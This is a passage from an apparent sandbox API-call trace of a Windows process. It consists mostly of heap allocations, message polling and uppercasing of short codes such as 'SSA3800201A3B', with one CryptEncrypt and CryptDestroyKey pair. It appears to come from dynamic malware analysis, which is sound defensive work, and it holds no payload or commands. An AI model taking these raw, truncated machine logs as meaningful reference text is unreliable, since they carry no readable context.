(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.023] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xc6c8, dwBufLen=0xc6d0 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xc6d0) returned 1 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0253.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0253.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0253.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.027] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.027] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.027] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.027] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.027] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.028] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.028] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.028] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.028] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.028] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.028] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.029] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.029] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.029] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.029] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.029] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.030] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.030] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.030] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.030] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.034] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.035] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.035] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.036] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.037] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.037] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0253.037] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.037] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0253.037] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.037] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.038] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.038] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.038] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.038] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.038] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.039] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0253.039] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.039] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.039] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.039] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.040] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.040] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.040] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.040] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.040] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.040] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.040] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.041] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.041] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.041] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.041] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.041] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.041] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.041] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.042] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.042] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.042] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 